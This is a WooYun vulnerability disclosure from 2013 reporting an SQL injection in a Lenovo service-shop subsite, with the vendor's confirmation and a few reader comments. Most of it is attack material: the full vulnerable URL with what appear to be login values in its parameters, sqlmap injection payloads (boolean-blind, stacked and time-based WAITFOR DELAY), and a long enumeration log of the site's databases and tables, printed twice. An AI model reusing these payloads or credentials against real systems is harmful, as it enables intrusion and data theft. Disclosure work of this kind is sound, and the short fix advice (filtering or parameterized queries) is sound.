当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040778

漏洞标题:联想某分站sql注射漏洞

相关厂商:联想

漏洞作者: Fireweed

提交时间:2013-10-23 18:13

修复时间:2013-12-07 18:14

公开时间:2013-12-07 18:14

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-23: 细节已通知厂商并且等待厂商处理中
2013-10-25: 厂商已经确认,细节仅向厂商公开
2013-11-04: 细节向核心白帽子及相关领域专家公开
2013-11-14: 细节向普通白帽子公开
2013-11-24: 细节向实习白帽子公开
2013-12-07: 细节向公众公开

简要描述:

一个很普通的注射,不过数据还是不少的。

详细说明:

http://serviceshop.lenovo.
com.cn/WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925&sysun=
wsilenovo&sysup=wsi@123lenovo&type=commentsused


Place: GET
Parameter: commentsno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' AND 6576=6576 AND
'kKEa'='kKEa&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=13774859788
15
Vector: AND [INFERENCE]
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925'; WAITFOR DELAY '0:
0:5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815
Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' WAITFOR DELAY '0:0
:5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--


current user: 'web_serviceshop'
current database: 'ServiceShop'

available databases [21]:
[*] CACHE_PSCM
[*] EUSSCMS
[*] ibis
[*] ideacms
[*] ideaDriver
[*] LB
[*] master
[*] model
[*] msdb
[*] Pccarer
[*] PremiumATDB
[*] ProductDB
[*] ServiceShop
[*] StaWeb
[*] tempdb
[*] thinkcms
[*] thinkDriver
[*] wsbx
[*] wsi_priv
[*] WSICMS
[*] wsidb


[16:06:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[16:06:12] [INFO] fetching database names
[16:06:12] [INFO] fetching number of databases
[16:06:12] [INFO] resumed: 21
[16:06:12] [INFO] resumed: CACHE_PSCM
[16:06:12] [INFO] resumed: EUSSCMS
[16:06:12] [INFO] resumed: ibis
[16:06:12] [INFO] resumed: ideacms
[16:06:12] [INFO] resumed: ideaDriver
[16:06:12] [INFO] resumed: LB
[16:06:12] [INFO] resumed: master
[16:06:12] [INFO] resumed: model
[16:06:12] [INFO] resumed: msdb
[16:06:12] [INFO] resumed: Pccarer
[16:06:12] [INFO] resumed: PremiumATDB
[16:06:12] [INFO] resumed: ProductDB
[16:06:12] [INFO] resumed: ServiceShop
[16:06:12] [INFO] resumed: StaWeb
[16:06:12] [INFO] resumed: tempdb
[16:06:12] [INFO] resumed: thinkcms
[16:06:12] [INFO] resumed: thinkDriver
[16:06:12] [INFO] resumed: wsbx
[16:06:12] [INFO] resumed: wsi_priv
[16:06:12] [INFO] resumed: WSICMS
[16:06:12] [INFO] resumed: wsidb
[16:06:13] [INFO] resumed: 0
[16:06:13] [INFO] fetching number of tables for database 'tempdb'
[16:06:13] [INFO] resumed: 0
[16:06:13] [INFO] fetching number of tables for database 'LB'
[16:06:13] [INFO] retrieved:
[16:06:13] [INFO] retrieved:
[16:06:14] [INFO] resumed: 0
[16:06:14] [INFO] fetching number of tables for database 'wsidb'
[16:06:14] [INFO] retrieved:
[16:06:14] [INFO] retrieved:
[16:06:14] [INFO] resumed: 0
[16:06:14] [INFO] fetching number of tables for database 'wsi_priv'
[16:06:14] [INFO] retrieved:
[16:06:14] [INFO] retrieved:
[16:06:15] [INFO] resumed: 0
[16:06:15] [INFO] fetching number of tables for database 'PremiumATDB'
[16:06:15] [INFO] retrieved:
[16:06:15] [INFO] retrieved:
[16:06:15] [INFO] resumed: 0
[16:06:15] [INFO] fetching number of tables for database 'ProductDB'
[16:06:15] [INFO] retrieved:
[16:06:15] [INFO] retrieved:
[16:06:15] [INFO] resumed: 0
[16:06:15] [INFO] fetching number of tables for database 'CACHE_PSCM'
[16:06:15] [INFO] retrieved:
[16:06:16] [INFO] retrieved:
[16:06:16] [INFO] resumed: 0
[16:06:16] [INFO] fetching number of tables for database 'ServiceShop'
[16:06:16] [INFO] resumed: 81
[16:06:16] [INFO] resumed: dbo.ACT_WenDa
[16:06:16] [INFO] resumed: dbo.EP_ClassProductRelation
[16:06:16] [INFO] resumed: dbo.EP_CodeDef
[16:06:16] [INFO] resumed: dbo.EP_CodeDef_temp
[16:06:16] [INFO] resumed: dbo.EP_HomePageProd
[16:06:16] [INFO] resumed: dbo.EP_PassCode
[16:06:16] [INFO] resumed: dbo.EP_PassCode_temp
[16:06:16] [INFO] resumed: dbo.EP_Promotion
[16:06:16] [INFO] resumed: dbo.EP_Promotion_temp
[16:06:16] [INFO] resumed: dbo.EP_PromotionProduct
[16:06:16] [INFO] resumed: dbo.EP_PromotionProduct_temp
[16:06:16] [INFO] resumed: dbo.EP_ServiceProductPrice
[16:06:16] [INFO] resumed: dbo.EP_ServiceProductPrice_temp
[16:06:16] [INFO] resumed: dbo.EP_ServiceProductRel
[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale
[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale_bak_20130607
[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale_temp
[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct
[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct_20130124
[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct_temp
[16:06:16] [INFO] resumed: dbo.SS_Agreement
[16:06:16] [INFO] resumed: dbo.SS_Attachments
[16:06:16] [INFO] resumed: dbo.SS_BigClass
[16:06:16] [INFO] resumed: dbo.SS_BigSmallClassRel
[16:06:16] [INFO] resumed: dbo.SS_Cart
[16:06:16] [INFO] resumed: dbo.SS_CartItem
[16:06:16] [INFO] resumed: dbo.SS_ClassInfo
[16:06:16] [INFO] resumed: dbo.SS_ClassProduct
[16:06:16] [INFO] resumed: dbo.SS_ClassPromotionExt
[16:06:16] [INFO] resumed: dbo.SS_Collection
[16:06:16] [INFO] resumed: dbo.SS_Could_Requests
[16:06:16] [INFO] resumed: dbo.SS_Delivery
[16:06:16] [INFO] resumed: dbo.SS_DictionaryValue
[16:06:16] [INFO] resumed: dbo.SS_DiscountRecord
[16:06:16] [INFO] resumed: dbo.SS_ErrorLog
[16:06:16] [INFO] resumed: dbo.SS_Evaluation
[16:06:16] [INFO] resumed: dbo.SS_EvaluationReply
[16:06:16] [INFO] resumed: dbo.SS_Explain
[16:06:16] [INFO] resumed: dbo.SS_FeedBack
[16:06:16] [INFO] resumed: dbo.SS_GroupInfo
[16:06:16] [INFO] resumed: dbo.SS_GroupProduct
[16:06:16] [INFO] resumed: dbo.SS_GroupPurchase
[16:06:16] [INFO] resumed: dbo.SS_Invoice
[16:06:16] [INFO] resumed: dbo.SS_LimitBuy
[16:06:16] [INFO] resumed: dbo.SS_LoginLog
[16:06:16] [INFO] resumed: dbo.SS_MyDiscount
[16:06:16] [INFO] resumed: dbo.SS_News
[16:06:16] [INFO] resumed: dbo.SS_PayLog
[16:06:16] [INFO] resumed: dbo.SS_PointsDiscount
[16:06:16] [INFO] resumed: dbo.SS_PointsRecord
[16:06:16] [INFO] resumed: dbo.SS_PointsRule
[16:06:16] [INFO] resumed: dbo.SS_PromExtItem
[16:06:16] [INFO] resumed: dbo.SS_PromotionExt
[16:06:16] [INFO] resumed: dbo.SS_SaleOrder
[16:06:16] [INFO] resumed: dbo.SS_SaleOrderLine
[16:06:16] [INFO] resumed: dbo.SS_SerchDictionary
[16:06:16] [INFO] resumed: dbo.SS_ServiceCouponInfo
[16:06:16] [INFO] resumed: dbo.SS_ServiceLucky
[16:06:16] [INFO] resumed: dbo.SS_ServicePrizeDetail
[16:06:16] [INFO] resumed: dbo.SS_ServiceProductAgreement
[16:06:16] [INFO] resumed: dbo.SS_ServiceProductExt
[16:06:16] [INFO] resumed: dbo.SS_SmallClass
[16:06:16] [INFO] resumed: dbo.SS_SmallClassProduct
[16:06:16] [INFO] resumed: dbo.SS_UserPoints
[16:06:16] [INFO] resumed: dbo.SS_Value
[16:06:16] [INFO] resumed: dbo.SS_VIP_User
[16:06:16] [INFO] resumed: dbo.SS_VIP_User2
[16:06:16] [INFO] resumed: dbo.SS_VisitLog
[16:06:16] [INFO] resumed: dbo.SS_VM_GroupPurchase_Order
[16:06:16] [INFO] resumed: dbo.SS_VM_LimitBuy_cs_Order
[16:06:16] [INFO] resumed: dbo.SS_VW_BianJiBuChongProduct
[16:06:16] [INFO] resumed: dbo.SS_VW_Evaluation
[16:06:16] [INFO] resumed: dbo.SS_VW_GroupProduct
[16:06:16] [INFO] resumed: dbo.SS_VW_ProductExt
[16:06:16] [INFO] resumed: dbo.SS_VW_PromotionBuy
[16:06:16] [INFO] resumed: dbo.SS_VW_SmallClassProduct
[16:06:16] [INFO] resumed: dbo.SS_WebserviceLog
[16:06:16] [INFO] resumed: dbo.SS_WebServiceRules
[16:06:16] [INFO] resumed: dbo.tbl_Zone
[16:06:16] [INFO] resumed: dbo.tbl_Zone_20121112
[16:06:16] [INFO] resumed: dbo.tbl_Zone_temp
[16:06:16] [INFO] fetching number of tables for database 'ibis'
[16:06:16] [INFO] retrieved:
[16:06:16] [INFO] retrieved:
[16:06:17] [INFO] resumed: 0
[16:06:17] [INFO] fetching number of tables for database 'EUSSCMS'
[16:06:17] [INFO] retrieved:
[16:06:17] [INFO] retrieved:
[16:06:17] [INFO] resumed: 0
[16:06:17] [INFO] fetching number of tables for database 'master'
[16:06:17] [INFO] resumed: 363
[16:06:17] [INFO] resumed: dbo.spt_fallback_db
[16:06:17] [INFO] resumed: dbo.spt_fallback_dev
[16:06:17] [INFO] resumed: dbo.spt_fallback_usg
[16:06:17] [INFO] resumed: dbo.spt_monitor
[16:06:17] [INFO] resumed: dbo.spt_values
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CHECK_CONSTRAINTS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMN_PRIVILEGES
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMNS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.DOMAINS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.KEY_COLUMN_USAGE
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.PARAMETERS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.ROUTINE_COLUMNS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.ROUTINES
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.SCHEMATA
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLE_CONSTRAINTS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLE_PRIVILEGES
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLES
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEW_COLUMN_USAGE
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEW_TABLE_USAGE
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEWS
[16:06:17] [INFO] resumed: sys.all_columns
[16:06:17] [INFO] resumed: sys.all_objects
[16:06:17] [INFO] resumed: sys.all_parameters
[16:06:17] [INFO] resumed: sys.all_sql_modules
[16:06:17] [INFO] resumed: sys.all_views
[16:06:17] [INFO] resumed: sys.allocation_units
[16:06:17] [INFO] resumed: sys.assemblies
[16:06:17] [INFO] resuming partial value: sys.assembly_f


表太多啦,我就不慢慢跑了。

漏洞证明:

available databases [21]:
[*] CACHE_PSCM
[*] EUSSCMS
[*] ibis
[*] ideacms
[*] ideaDriver
[*] LB
[*] master
[*] model
[*] msdb
[*] Pccarer
[*] PremiumATDB
[*] ProductDB
[*] ServiceShop
[*] StaWeb
[*] tempdb
[*] thinkcms
[*] thinkDriver
[*] wsbx
[*] wsi_priv
[*] WSICMS
[*] wsidb


[16:06:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[16:06:12] [INFO] fetching database names
[16:06:12] [INFO] fetching number of databases
[16:06:12] [INFO] resumed: 21
[16:06:12] [INFO] resumed: CACHE_PSCM
[16:06:12] [INFO] resumed: EUSSCMS
[16:06:12] [INFO] resumed: ibis
[16:06:12] [INFO] resumed: ideacms
[16:06:12] [INFO] resumed: ideaDriver
[16:06:12] [INFO] resumed: LB
[16:06:12] [INFO] resumed: master
[16:06:12] [INFO] resumed: model
[16:06:12] [INFO] resumed: msdb
[16:06:12] [INFO] resumed: Pccarer
[16:06:12] [INFO] resumed: PremiumATDB
[16:06:12] [INFO] resumed: ProductDB
[16:06:12] [INFO] resumed: ServiceShop
[16:06:12] [INFO] resumed: StaWeb
[16:06:12] [INFO] resumed: tempdb
[16:06:12] [INFO] resumed: thinkcms
[16:06:12] [INFO] resumed: thinkDriver
[16:06:12] [INFO] resumed: wsbx
[16:06:12] [INFO] resumed: wsi_priv
[16:06:12] [INFO] resumed: WSICMS
[16:06:12] [INFO] resumed: wsidb
[16:06:13] [INFO] resumed: 0
[16:06:13] [INFO] fetching number of tables for database 'tempdb'
[16:06:13] [INFO] resumed: 0
[16:06:13] [INFO] fetching number of tables for database 'LB'
[16:06:13] [INFO] retrieved:
[16:06:13] [INFO] retrieved:
[16:06:14] [INFO] resumed: 0
[16:06:14] [INFO] fetching number of tables for database 'wsidb'
[16:06:14] [INFO] retrieved:
[16:06:14] [INFO] retrieved:
[16:06:14] [INFO] resumed: 0
[16:06:14] [INFO] fetching number of tables for database 'wsi_priv'
[16:06:14] [INFO] retrieved:
[16:06:14] [INFO] retrieved:
[16:06:15] [INFO] resumed: 0
[16:06:15] [INFO] fetching number of tables for database 'PremiumATDB'
[16:06:15] [INFO] retrieved:
[16:06:15] [INFO] retrieved:
[16:06:15] [INFO] resumed: 0
[16:06:15] [INFO] fetching number of tables for database 'ProductDB'
[16:06:15] [INFO] retrieved:
[16:06:15] [INFO] retrieved:
[16:06:15] [INFO] resumed: 0
[16:06:15] [INFO] fetching number of tables for database 'CACHE_PSCM'
[16:06:15] [INFO] retrieved:
[16:06:16] [INFO] retrieved:
[16:06:16] [INFO] resumed: 0
[16:06:16] [INFO] fetching number of tables for database 'ServiceShop'
[16:06:16] [INFO] resumed: 81
[16:06:16] [INFO] resumed: dbo.ACT_WenDa
[16:06:16] [INFO] resumed: dbo.EP_ClassProductRelation
[16:06:16] [INFO] resumed: dbo.EP_CodeDef
[16:06:16] [INFO] resumed: dbo.EP_CodeDef_temp
[16:06:16] [INFO] resumed: dbo.EP_HomePageProd
[16:06:16] [INFO] resumed: dbo.EP_PassCode
[16:06:16] [INFO] resumed: dbo.EP_PassCode_temp
[16:06:16] [INFO] resumed: dbo.EP_Promotion
[16:06:16] [INFO] resumed: dbo.EP_Promotion_temp
[16:06:16] [INFO] resumed: dbo.EP_PromotionProduct
[16:06:16] [INFO] resumed: dbo.EP_PromotionProduct_temp
[16:06:16] [INFO] resumed: dbo.EP_ServiceProductPrice
[16:06:16] [INFO] resumed: dbo.EP_ServiceProductPrice_temp
[16:06:16] [INFO] resumed: dbo.EP_ServiceProductRel
[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale
[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale_bak_20130607
[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale_temp
[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct
[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct_20130124
[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct_temp
[16:06:16] [INFO] resumed: dbo.SS_Agreement
[16:06:16] [INFO] resumed: dbo.SS_Attachments
[16:06:16] [INFO] resumed: dbo.SS_BigClass
[16:06:16] [INFO] resumed: dbo.SS_BigSmallClassRel
[16:06:16] [INFO] resumed: dbo.SS_Cart
[16:06:16] [INFO] resumed: dbo.SS_CartItem
[16:06:16] [INFO] resumed: dbo.SS_ClassInfo
[16:06:16] [INFO] resumed: dbo.SS_ClassProduct
[16:06:16] [INFO] resumed: dbo.SS_ClassPromotionExt
[16:06:16] [INFO] resumed: dbo.SS_Collection
[16:06:16] [INFO] resumed: dbo.SS_Could_Requests
[16:06:16] [INFO] resumed: dbo.SS_Delivery
[16:06:16] [INFO] resumed: dbo.SS_DictionaryValue
[16:06:16] [INFO] resumed: dbo.SS_DiscountRecord
[16:06:16] [INFO] resumed: dbo.SS_ErrorLog
[16:06:16] [INFO] resumed: dbo.SS_Evaluation
[16:06:16] [INFO] resumed: dbo.SS_EvaluationReply
[16:06:16] [INFO] resumed: dbo.SS_Explain
[16:06:16] [INFO] resumed: dbo.SS_FeedBack
[16:06:16] [INFO] resumed: dbo.SS_GroupInfo
[16:06:16] [INFO] resumed: dbo.SS_GroupProduct
[16:06:16] [INFO] resumed: dbo.SS_GroupPurchase
[16:06:16] [INFO] resumed: dbo.SS_Invoice
[16:06:16] [INFO] resumed: dbo.SS_LimitBuy
[16:06:16] [INFO] resumed: dbo.SS_LoginLog
[16:06:16] [INFO] resumed: dbo.SS_MyDiscount
[16:06:16] [INFO] resumed: dbo.SS_News
[16:06:16] [INFO] resumed: dbo.SS_PayLog
[16:06:16] [INFO] resumed: dbo.SS_PointsDiscount
[16:06:16] [INFO] resumed: dbo.SS_PointsRecord
[16:06:16] [INFO] resumed: dbo.SS_PointsRule
[16:06:16] [INFO] resumed: dbo.SS_PromExtItem
[16:06:16] [INFO] resumed: dbo.SS_PromotionExt
[16:06:16] [INFO] resumed: dbo.SS_SaleOrder
[16:06:16] [INFO] resumed: dbo.SS_SaleOrderLine
[16:06:16] [INFO] resumed: dbo.SS_SerchDictionary
[16:06:16] [INFO] resumed: dbo.SS_ServiceCouponInfo
[16:06:16] [INFO] resumed: dbo.SS_ServiceLucky
[16:06:16] [INFO] resumed: dbo.SS_ServicePrizeDetail
[16:06:16] [INFO] resumed: dbo.SS_ServiceProductAgreement
[16:06:16] [INFO] resumed: dbo.SS_ServiceProductExt
[16:06:16] [INFO] resumed: dbo.SS_SmallClass
[16:06:16] [INFO] resumed: dbo.SS_SmallClassProduct
[16:06:16] [INFO] resumed: dbo.SS_UserPoints
[16:06:16] [INFO] resumed: dbo.SS_Value
[16:06:16] [INFO] resumed: dbo.SS_VIP_User
[16:06:16] [INFO] resumed: dbo.SS_VIP_User2
[16:06:16] [INFO] resumed: dbo.SS_VisitLog
[16:06:16] [INFO] resumed: dbo.SS_VM_GroupPurchase_Order
[16:06:16] [INFO] resumed: dbo.SS_VM_LimitBuy_cs_Order
[16:06:16] [INFO] resumed: dbo.SS_VW_BianJiBuChongProduct
[16:06:16] [INFO] resumed: dbo.SS_VW_Evaluation
[16:06:16] [INFO] resumed: dbo.SS_VW_GroupProduct
[16:06:16] [INFO] resumed: dbo.SS_VW_ProductExt
[16:06:16] [INFO] resumed: dbo.SS_VW_PromotionBuy
[16:06:16] [INFO] resumed: dbo.SS_VW_SmallClassProduct
[16:06:16] [INFO] resumed: dbo.SS_WebserviceLog
[16:06:16] [INFO] resumed: dbo.SS_WebServiceRules
[16:06:16] [INFO] resumed: dbo.tbl_Zone
[16:06:16] [INFO] resumed: dbo.tbl_Zone_20121112
[16:06:16] [INFO] resumed: dbo.tbl_Zone_temp
[16:06:16] [INFO] fetching number of tables for database 'ibis'
[16:06:16] [INFO] retrieved:
[16:06:16] [INFO] retrieved:
[16:06:17] [INFO] resumed: 0
[16:06:17] [INFO] fetching number of tables for database 'EUSSCMS'
[16:06:17] [INFO] retrieved:
[16:06:17] [INFO] retrieved:
[16:06:17] [INFO] resumed: 0
[16:06:17] [INFO] fetching number of tables for database 'master'
[16:06:17] [INFO] resumed: 363
[16:06:17] [INFO] resumed: dbo.spt_fallback_db
[16:06:17] [INFO] resumed: dbo.spt_fallback_dev
[16:06:17] [INFO] resumed: dbo.spt_fallback_usg
[16:06:17] [INFO] resumed: dbo.spt_monitor
[16:06:17] [INFO] resumed: dbo.spt_values
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CHECK_CONSTRAINTS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMN_PRIVILEGES
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMNS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.DOMAINS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.KEY_COLUMN_USAGE
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.PARAMETERS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.ROUTINE_COLUMNS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.ROUTINES
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.SCHEMATA
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLE_CONSTRAINTS
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLE_PRIVILEGES
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLES
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEW_COLUMN_USAGE
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEW_TABLE_USAGE
[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEWS
[16:06:17] [INFO] resumed: sys.all_columns
[16:06:17] [INFO] resumed: sys.all_objects
[16:06:17] [INFO] resumed: sys.all_parameters
[16:06:17] [INFO] resumed: sys.all_sql_modules
[16:06:17] [INFO] resumed: sys.all_views
[16:06:17] [INFO] resumed: sys.allocation_units
[16:06:17] [INFO] resumed: sys.assemblies
[16:06:17] [INFO] resuming partial value: sys.assembly_f

修复方案:

过滤或者参数化查询哦亲

版权声明:转载请注明来源 Fireweed@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-10-25 10:44

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-24 11:10 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    你好!请教下这是工具测得吗?

  2. 2013-12-07 19:49 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

    @HackBraid 肯定是啊backtrack下的sqlmap工具

  3. 2013-12-07 20:13 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    @Murk Emissary 哦哦,你的那个漏洞也蛮有意思 为啥忽略了